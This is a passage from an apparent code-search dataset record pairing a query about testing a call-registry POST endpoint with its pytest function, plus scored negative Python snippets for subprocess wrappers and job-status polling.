'fatal'.encode('utf-8') in cmd_result:\n cmd_rc = False\n else:\n cmd_rc = True\n return (cmd_rc, cmd_result)", "def call_command(command: List[str], shell: bool = False, **kwargs) -> bool:\n log_command(command)\n exit_code = subprocess.call(_format_command(command, shell), shell=shell, **kwargs)\n logger.debug(\"Command exit code: {}\".format(exit_code))\n\n return not bool(exit_code)", "def get_status(self):\n\t\treturn call_sdk_function('PrlJob_GetStatus', self.handle)", "def check_execution(programm: List[str]):\n line_counter = 0\n list_of_executed_lines = [0]\n accumulator_value = {'act_val': 0}\n last_instruction = len(programm)\n while True:\n (command, value) = programm[line_counter]\n if command == 'nop':\n line_counter = nop(line_counter, value)\n if command == 'jmp':\n line_counter = jump(line_counter, value)\n if command == 'acc':\n line_counter = acc(line_counter, accumulator_value, value)\n if line_counter in list_of_executed_lines:\n print(\n f'Found first line visted twice! 
{line_counter} after {len(list_of_executed_lines)} operations')\n print(f'Accumulator value is {accumulator_value[\"act_val\"]}')\n return False, accumulator_value\n else:\n list_of_executed_lines.append(line_counter)\n if line_counter == last_instruction:\n print('Found end of programm!')\n return True, accumulator_value", "def get_result(self, wait=-1):\n\n if not self.is_done():\n\n if wait >= 0:\n self.thread.join(wait)\n\n else:\n raise Asynchronous.NotYetDoneException(\n 'the call has not yet completed its task'\n )\n\n if self.result is None:\n self.result = self.queue.get()\n\n return self.result", "def done(self):\n future = self.future\n\n if future:\n result = future.done()\n return result", "def call(self):\n\n process = subprocess.Popen(self._cmd, stdout=self._stdout, stderr=self._stderr,\n shell=isinstance(self._cmd, basestring), env=self._env, cwd=self._cwd)\n returnData = process.communicate()\n\n return ProcessResult(process.returncode, returnData[0], returnData[1])", "def _get_execution_status(self, execution_id, document_name=None):\n execution = self.ssm_client.get_automation_execution(\n AutomationExecutionId=execution_id\n )\n # TODO(semiond): we can remove document name as parameter, can take it by execution id.\n document_name = document_name if document_name else execution['AutomationExecution']['DocumentName']\n step_executions = execution['AutomationExecution']['StepExecutions']\n step = self._get_step_by_status(step_executions, 'InProgress')\n if step:\n step_name = step['StepName']\n self.logger.info(f'Waiting SSM document step [{document_name}>{step_name}] to be completed: '\n f'{self.get_execution_step_url(execution_id, step_name, step_executions)}')\n return execution['AutomationExecution']['AutomationExecutionStatus']", "def _exec_cmd(self, cmd):\n proc = subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n (out, err) = proc.communicate()\n ret = proc.returncode\n logging.debug('cmd: %s, stdout: %s, stderr: %s, ret: %s', cmd, out,\n err, ret)\n if ret == 0:\n return out\n else:\n raise AdbError(cmd=cmd, stdout=out, stderr=err, ret_code=ret)", "def _is_job_finished(self, job_id):\n complete, rc, status, result, task = False, 0, None, None, None\n job = self.get_job_by_id(job_id)\n if job:\n status = job['status']\n try:\n result, task = job['result'], job['task']\n except KeyError:\n pass\n if status.lower() == SUCCEEDED:\n complete = True\n elif status.lower() in INCOMPLETE_LIST:\n complete = False\n else:\n rc, complete = -1, True\n return complete, result, rc, status, task", "def result(self):\n if not self.ready:\n self.compute()\n return self.ready", "def proc_exec_async(cmd):\n\n envoy.connect(cmd)\n return None", "def Subprocess(self, cmd):\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = p.communicate()\n return (p.returncode, stdout, stderr)", "def success(self):\n return self.status == 0 and self.stdout", "def wait_for(self, operation, timeout=5):\n \n # TODO: Remove this check when the Scheduler no longer useses deferred's\n if isinstance(operation, Deferred):\n operation.addCallbacks(self.quit_with_result, self.quit_with_error)\n self.wait(timeout)\n\n if hasattr(operation.result, 'raiseException'):\n operation.result.raiseException()\n else:\n operation.add_observer(self, 'is_finished', 0, self.quit)\n self.queue.add_operation(operation)\n \n self.wait(timeout)\n \n # Both deferred or an operation will return here\n return operation.result", "def value(self):\n 
self.event.wait()\n if not self.exc:\n return self.result\n else:\n exc = self.exc\n if not self.exc:\n exc = StandardError('no result')\n raise exc", "def asyncgetresult(self,server_,port_,token_):\n if isinstance(server_,unicode):\n server_ = server_.encode(\"utf-8\",errors=\"replace\")\n if isinstance(port_,unicode):\n port_ = port_.encode(\"utf-8\",errors=\"replace\")\n if isinstance(token_,unicode):\n token_ = token_.encode(\"utf-8\",errors=\"replace\")\n respavailable_ = ctypes.c_int32()\n resp_ = ctypes.c_int32()\n trm_ = ctypes.c_int32()\n res = __library__.MSK_XX_asyncgetresult(self.__nativep,server_,port_,token_,ctypes.byref(respavailable_),ctypes.byref(resp_),ctypes.byref(trm_))\n if res != 0:\n _,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n respavailable_ = respavailable_.value\n _respavailable_return_value = respavailable_\n _resp_return_value = rescode(resp_.value)\n _trm_return_value = rescode(trm_.value)\n return (_respavailable_return_value,_resp_return_value,_trm_return_value)", "def is_async(self) -> bool:\n return self.__is_async", "def isFinished(self):\r\n try:\r\n output = Popen(\"qstat | grep \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n if self.jobId in output:\r\n if output.split()[4] == \"Eqw\":\r\n #If the job fails, print a warning, and wait a minute so the user can check why the job fails,\r\n #before resubmitting the job.\r\n logging.warning(\"job \" + output.split()[2] + \" failed to run, resubmitting in one minute\")\r\n time.sleep(60)\r\n output = Popen(\"qdel \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n self.submit()\r\n return False\r\n else:\r\n logging.info(\"job with ID: \" + self.jobId + \" is finished.\")\r\n return True\r\n \r\n except ValueError:\r\n logging.info(\"Error: waiting for not submitted job...\")" ]
[ "0.6209489", "0.5881146", "0.57704556", "0.5739999", "0.57303506", "0.56933546", "0.56448203", "0.560831", "0.5604192", "0.56039965", "0.55831635", "0.5569415", "0.549603", "0.549603", "0.549603", "0.549603", "0.549603", "0.549603", "0.5446532", "0.5408486", "0.53901416", "0.53899354", "0.5343078", "0.5314595", "0.5265895", "0.52458835", "0.52325565", "0.52004564", "0.5195147", "0.5192385", "0.5172518", "0.51630855", "0.51570153", "0.51502806", "0.5145693", "0.5127453", "0.5124669", "0.51163733", "0.51105595", "0.5106413", "0.510547", "0.5102128", "0.50933534", "0.50906736", "0.50887674", "0.5070433", "0.50699556", "0.5057975", "0.5052826", "0.5049234", "0.5038654", "0.50286746", "0.5028312", "0.5021387", "0.5017547", "0.5005221", "0.4995459", "0.4983271", "0.49805698", "0.49705046", "0.49546266", "0.49421138", "0.4938951", "0.4938483", "0.49314237", "0.49306422", "0.4906907", "0.4901921", "0.48889264", "0.48884037", "0.48838067", "0.48755845", "0.48742393", "0.48606563", "0.48510528", "0.48482025", "0.4846087", "0.4844524", "0.4844524", "0.4844524", "0.48389354", "0.4831956", "0.48319", "0.48286414", "0.48234373", "0.48220667", "0.48202893", "0.4812617", "0.48068264", "0.48011586", "0.47994447", "0.47980604", "0.47958475", "0.4795839", "0.4789264", "0.47877395", "0.478711", "0.4770706", "0.47683853", "0.4767934" ]
0.53526616
22
Test POST a start call registry and expect a response from API containing a job_id and the data posted. Test uses start_call_fx fixture
def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx): url = reverse_lazy('calls:registry-list') response = client.post(url, start_call_fx, content_type='application/json') response_data = response.json() assert response.status_code == status.HTTP_201_CREATED assert 'job_id' in response_data for item in start_call_fx.items(): assert item in response_data['data'].items()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": 
\"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def start_test(self, request):\n request.worker.start_test(request.message.test_id)\n\n return SuccessReply()", "def test_submit_job(self):\n body = '\\\"{train: \\\\\\\"http:/github.com/path/file1\\\\\\\", seed:5, epochs: 5000}\\\"'\n response = self.client.open(\n '/tx-queue/2/scheduler/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_post_job(self):\n body = UnitTesterJobCreateReq()\n response = self.client.open(\n '/v1/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def start_test_run(self, request):\n request.worker.initialize_test_run(request.message.tests,\n request.message.run_data)\n\n return SuccessReply()", "def post(self):\n data = api.payload\n\n try:\n phone_call = PhoneCallStart(\n parser.parse(data[\"start_timestamp\"]),\n data[\"call_id\"],\n data[\"source\"],\n data[\"destination\"]\n )\n except AssertionError as error:\n return error.args, 400\n\n repository.db.session.add(phone_call)\n repository.db.session.commit()\n\n return phone_call, 201", "def test_api_post(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('POST', url, status=201, body=b'some xml and stuff')\n response = new_job.request('post', url, data=b'stuff')\n assert response == b'some xml and stuff'\n assert httpretty.last_request().body == b'stuff'", "def post(self):\n data = api.payload\n\n try:\n phone_call_start = repository.find_start_call_by_call_id(data[\"call_id\"])\n except NoResultFound:\n return 'no call found by specified call id', 404\n\n phone_call_start.end_timestamp = parser.parse(data[\"end_timestamp\"]).replace(tzinfo=None)\n\n # repository.session.add(phone_call_start)\n repository.db.session.commit()\n\n return phone_call_start", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_successful(self, mock_create, mock_msg_mgr):\n\n json_data = {\n \"input\" : {\n 'version': '6',\n 'files': {'input_a': [self.source_file.id]},\n 'json': {}\n },\n \"job_type_id\" : self.job_type1.pk\n }\n\n url = 
'/%s/jobs/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n #Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertEqual(result['max_tries'], 3)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])\n mock_create.assert_called_once()", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def test_creating_a_job(created_job, bulk_request):\n assert created_job.job == 'THEJOBID'\n assert created_job.job_url == 'https://salesforce/services/async/34.0/job/THEJOBID'\n assert created_job.pending_batches == []\n assert created_job.is_open\n\n bulk_request.assert_called_once_with(\n 'post',\n 'https://salesforce/services/async/34.0/job',\n data=XMLMatcher('''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <jobInfo xmlns=\"http://www.force.com/2009/06/asyncapi/dataload\">\n <operation>update</operation>\n <object>Lead</object>\n <contentType>CSV</contentType>\n </jobInfo>\n ''')\n )", "def test_success_on_post(self, mock_create, mock_msg_mgr):\n\n url = '/%s/jobs/' % self.api\n\n User.objects.create_superuser(username='test', email='[email protected]', password='password')\n\n self.client.login(username='test', password='password',)\n response = self.client.post(url, data=self.json_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n # Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])", "async def test_launch_400():\n work_queue = asyncio.Queue()\n await work_queue.put(TestData.JOB_TEMPLATE_LAUNCH_PAYLOAD)\n worker = tower_api_worker.TowerApiWorker(TestData.config, None, work_queue)\n with aioresponses() as mocked:\n mocked.post(\n TestData.JOB_TEMPLATE_POST_URL, status=400, body=\"BAD DATA\",\n )\n with pytest.raises(Exception) as excinfo:\n await worker.start()\n assert \"BAD DATA\" in str(excinfo.value)", "def start_job(self):\n # POST /jobs/{job_id}/results\n pass", "def test_create_seed_validation(self):\n\n url = '/%s/job-types/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['name'] = 'validation'\n\n json_data = {\n 'icon_code': 'BEEF',\n 'is_published': True,\n 'docker_image': 'my-new-job-1.0.0-seed:1.0.0',\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)", "def test_create_valid_submission(self):\n with self.client:\n # valid submission registration\n sub_response = register_ok_submission(self, self.token)\n response_data = json.loads(sub_response.data.decode())\n self.assertTrue(response_data['status']=='success')", "def 
test_create_empty_payload(self):\n response = self.client.post('/routines/', data={})\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def test_run_prefix__success_with_json(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--metadata-json\",\n '{\"somekey\": \"somevalue\"}',\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Assigning metadata to the uploaded samples.\" in res.output", "def pytest_runtest_call(self, item):\n if not item.config.option.tc_duration:\n self.detailed_duration[item.nodeid]['call'] = time.time()\n\n if self._buildname is None:\n self.buildname(item.config.env.env_prop)\n if self._buildname is not None and not self._init_session:\n self._sessionstart(item)\n self._init_session = True\n self._send_post_request(item)", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def test_run(self, mock):\n mock.return_value = mock_trello_service()\n\n pull_requests = PullRequest.query.all()\n self.assertTrue(len(pull_requests) is 0)\n\n payload = json_fixture('./tests/fixtures/pull_request_opened.json')\n CreatePullRequestCard.delay(\n board_id=default_board_id,\n list_id=default_list_id,\n name='Fake Pull Request',\n payload=payload\n )\n\n # Enqueuing new pull_request `CreatePullRequestCard` should create a\n # `PullRequest` record\n new_pull_requests = PullRequest.query.all()\n self.assertTrue(len(new_pull_requests) is 1)", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "def start_run(group_id):\n # Get the access token first to raise an error immediately if no token is\n # present (to avoid unnecessarily instantiating the service API).\n token = ACCESS_TOKEN(request)\n # Verify that the request contains a valid Json object that contains a\n # optional list of workflow arguments.\n obj = jsonbody(request, optional=[labels.RUN_ARGUMENTS])\n args = obj[labels.RUN_ARGUMENTS] if labels.RUN_ARGUMENTS in obj else dict()\n from robflask.service import service\n with service(access_token=token) as api:\n # Authentication of the user from the expected api_token in the header\n # will fail if no token is given 
or if the user is not logged in.\n try:\n r = api.runs().start_run(group_id=group_id, arguments=args)\n except UnknownParameterError as ex:\n # Convert unknown parameter errors into invalid request errors\n # to avoid sending a 404 response\n raise err.InvalidRequestError(str(ex))\n return make_response(jsonify(r), 201)", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert state[\"attributes\"] == {\"data\": 1}", "def test_post_job_log_export(self):\n job_id = 'job_id_example'\n response = self.client.open(\n '/v1/job/logs',\n method='POST',\n data=json.dumps(job_id),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def start(self, **kwargs):\n return self.client.api.start(self.id, **kwargs)", "def test_get_start_form_data(self):\n pass", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_get_job(self):\n response = self.client.open(\n 
'/v1/job/{id}'.format(id='id_example'),\n method='GET',\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_build_payload(self):\n pytrend = TrendReq()\n pytrend.build_payload(kw_list=['pizza', 'bagel'])\n self.assertIsNotNone(pytrend.token_payload)", "def test_run_prefix__success(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Number of samples assigned to the project\" in res.output\n assert \"Assigning metadata to the uploaded samples.\" not in res.output", "async def job_start(self, uid, args, env, cwd, port_expected_count,\n forward_stdout=False):\n self._require_running()\n if port_expected_count and self._job_start_endpoint is None:\n raise RuntimeError(\n 'cannot run server job: job start endpoint is not set'\n )\n process_env = dict(os.environ)\n # TODO: Make properties case-insensitve, forced uppercase?\n self._extend_with_prefix(\n process_env,\n self._properties,\n self.PREFIX_PROPERTIES\n )\n if port_expected_count:\n self._extend_with_prefix(\n process_env,\n {\n self.PROPERTY_JOB_ENDPOINT: self._job_start_endpoint,\n self.PROPERTY_JOB_ID: str(uid)\n },\n self.PREFIX_PROPERTIES\n )\n process_env.update(env or {})\n\n await self._get_job(uid).start(\n args, process_env, cwd, port_expected_count, forward_stdout\n )\n # TODO: Support job queueing?\n # (and finite amount of job slots on an agent instance)", "def test_create_monitoring_success(\n self,\n mock_kfp_client,\n ):\n project_id = util.MOCK_UUID_1\n deployment_id = util.MOCK_UUID_1\n task_id = util.MOCK_UUID_1\n\n rv = TEST_CLIENT.post(\n f\"/projects/{project_id}/deployments/{deployment_id}/monitorings\",\n json={\n \"taskId\": task_id,\n },\n )\n result = rv.json()\n expected = {\n \"createdAt\": mock.ANY,\n \"deploymentId\": deployment_id,\n \"taskId\": task_id,\n \"task\": {\"name\": util.MOCK_TASK_NAME_1, \"tags\": []},\n \"uuid\": mock.ANY,\n }\n self.assertEqual(result, expected)\n self.assertEqual(rv.status_code, 200)\n\n mock_kfp_client.assert_any_call(host=\"http://ml-pipeline.kubeflow:8888\")", "def start(self):\n url = \"/jobs.start\"\n payload = {\n \"id\": self.id\n }\n response = self.engine.request(\"POST\", url, json=payload)\n if response.status_code != 200:\n raise EngineError(\"Failed to upload the job payload. ({} - {})\".format(response.status_code, response.text[:100]))\n\n d = response.json()\n if d['ok'] is False:\n raise EngineError(\"Failed to upload the job payload. 
({})\".format(d['error']))\n\n self._update(d['job'])", "def start(self):\n self.server.request(\"post\", \"/jobs/%s/%s/state\" % (self.sessionid,\n self.name), body=\"1\")\n return True", "def test_post_building(self):\n url = '/building/'\n data = {\"address\": \"дом 50 улица Ленина\", \"total_bricks_required\": 300}\n today = date.today()\n date_output = today.strftime(\"%Y-%m-%d\")\n data_output = {\n \"id\": 1,\n \"address\": \"дом 50 улица Ленина\",\n \"date_start\": date_output,\n \"date_completed\": None,\n \"date_last_load\": None,\n \"bricks_at_the_moment\": 0,\n \"total_bricks_required\": 300,\n \"date_updated\": date_output\n }\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(response.data, data_output)", "def test_ready_post(self):\n response = self.client.open(\n '/ready',\n method='POST')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_test(self):\n self.protocol.startTest(self.test)\n self.assertEqual(self.io.getvalue(), compat._b(\n \"test: %s\\n\" % self.test.id()))", "def test_starts_returned_async(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n returned_async = Mock(spec=Async)\n\n work = Async(target=_fake_async_returning_target,\n args=[returned_async])\n\n with _ExecutionContext(work):\n run_job()\n\n returned_async.start.assert_called_once_with()", "def post(self):\n data = request.json\n create_testing_scenario(data)\n return None, 201", "def test_successful_configuration(self, mock_create, mock_msg_mgr):\n\n json_data = {\n \"input\" : {\n 'version': '6',\n 'files': {'input_a': [self.source_file.id]},\n 'json': {}\n },\n \"job_type_id\" : self.job_type1.pk,\n \"configuration\" : self.configuration\n }\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n #Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])\n mock_create.assert_called_once()", "def test_success_start(self, put, get, auth, circuits_app, fn_cloud_foundry_action, fn_cloud_foundry_applications):\n auth.return_value = AuthenticationMock()\n put.return_value = give_response(201, GUIDS_MOCK[\"resources\"][0])\n get.return_value = give_response(200, GUIDS_MOCK)\n\n function_params = {\n \"fn_cloud_foundry_action\": fn_cloud_foundry_action,\n \"fn_cloud_foundry_applications\": fn_cloud_foundry_applications\n }\n results = call_fn_cloud_foundry_manage_applications_function(circuits_app, function_params)\n assert results[\"test1\"][\"success\"] == True\n assert results[\"test1\"][\"current_state\"] == \"STARTED\"", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n 
